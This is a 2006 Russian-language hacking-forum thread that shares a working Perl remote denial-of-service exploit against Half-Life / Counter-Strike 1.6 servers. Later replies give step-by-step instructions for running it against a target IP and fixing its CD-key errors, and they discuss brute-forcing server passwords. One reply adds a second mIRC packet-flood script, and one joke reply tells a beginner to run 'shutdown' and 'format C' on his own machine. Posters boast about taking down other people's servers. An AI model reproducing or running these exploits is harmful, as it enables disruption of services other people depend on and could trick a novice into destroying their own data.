PDA

Просмотр полной версии : CS-sploit


kipfun
07.06.2006, 18:54
нашел рульный сплот убивающий серваки CS:

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
# dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD
$BADPASSWORD

у кого какие соображения будут ?

max_pain89
07.06.2006, 19:31
у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш

Talisman
07.06.2006, 21:49
у меня появились - защищу свой сервер :)

Dracula4ever
08.06.2006, 14:27
Не плохой сплойт.
Спасибо!

kipfun
13.06.2006, 11:37
Сам тащусь..... :) но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.

De_X
13.06.2006, 14:26
:rolleyes: подскажите пожалуйста куда сам сплойт пихать чтоб отрубить сервак?

Haz3r
13.06.2006, 15:06
Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские ;) так что давай жги сервы !

max_pain89
13.06.2006, 17:36
ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.

TreniX
13.06.2006, 19:42
Сплойт рулит!! :D
а где ты его добыл?? :confused:

De_X
13.06.2006, 20:07
ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.
а как этот сплойт включать? я на сервак зайдуи как сплоит активировать?

kipfun
14.06.2006, 10:52
пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS

Haz3r
14.06.2006, 14:10
Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно :) )

ProTeuS
14.06.2006, 14:28
Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет

ProTeuS
14.06.2006, 14:30
и нас4ет брута: еще для 45-46 протоколов были готовые реализации...

De_X
14.06.2006, 20:21
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

lolka
15.06.2006, 00:14
2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне
****

A00000000 1617623932 2

>****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64
ed866538c9db76""\"
****9Invalid hashed CD key.

Можети обьснить мне что это такое?;)

kipfun
15.06.2006, 10:39
неверный CD ключ, введи в строку (cdkey\\f0ef8a362 58af1bb64ed866538c9db76) действительный ключ...

lolka
15.06.2006, 13:25
2kipfun: а ты пробывал? ;) сам пользватся этим експлойтом? ;)

kipfun
15.06.2006, 15:37
обижашь :) в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...

stalker.md
26.06.2006, 11:02
Я открываю перл делаю как ва написали,мне пишет:
<Do you need to predeclare pl?>
А этот сплоит куда пихать надо?
как можно бан в кс снять?
Подскажите чтото* :(

forever777
26.06.2006, 12:42
интернет сервера кс рубить мона?

forever777
26.06.2006, 12:48
пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS
уверен что c:\Perl/bin/perl.exe может c:\Perl\bin\perl.exe

kipfun
27.06.2006, 22:36
ой слэшики перепутал простите! :)

ProTeuS
28.06.2006, 00:48
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

как я понимаю, ре4ь идет о плагине к метамоду (амх мод?), тогда имхо это не представляется возможнЫм, кроме как юзанья какой-нить специфи4еской баги плагина, либо воода необработываемого стим-идентификатора для невозможности корректного ввода команды amx_ban

ZINGER
28.06.2006, 01:04
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...
может просто парниша ставил символ `

ProTeuS
28.06.2006, 01:20
в valveID? ;)
сомневаюсь 4то он таким макаром приконнектился куда-либо (в ник разве4то, но только для тех, кто не знает командs users; kick #id)

Lam
13.07.2006, 09:30
А чо бан снять как в чате нельзя что ли? сменить Ip и все такое еще что бы не кикнули в ник можно вставить не видимый символ, слышал помогает хотя сам еще не пробовал.

ZINGER
13.07.2006, 10:03
вставить не видимый символ
есть стоит amxmod (99% серверов) это не спасет

Fro$T
26.07.2006, 16:54
\"A00000000 1617623932 2

>****connect 47 1617623932 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64
ed866538c9db76\"\"\\\"
****9Invalid hashed CD key.\"
тоже такая ошибка вылетает,хоя ключ вставлял нормальный

GluckX
17.08.2006, 01:05
Существует ещё эксплойтик. Нужно просто указать ипшник :)

Реализация под win32: http://lex-studio.by.ru/soft/gs/soft_GameSearcher11.htm

Скрипт для мирк:
CSBoom {
var %ips $$?="Мочи ламаков"
var %buf $chr(254) $+ $chr(255) $+ $chr(255) $+ $chr(255) $+ $chr(0) $+ $chr(0) $+ $chr(0) $+ $chr(0)
/sockudp cs %ips 27015 %buf
echo %ips уничтожен
}

gemaglabin
17.08.2006, 12:53
Вот портированный perl сплоит на php

http://underwater.cup.su/cs.php

tRu
17.08.2006, 17:51
А не дос ли? Он работает от 3 лица?

Sn][per
15.02.2007, 17:16
как сменить метод аутентификации 4
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
на 2
что поменять надо?
тупо сменить 4 на 2 не катит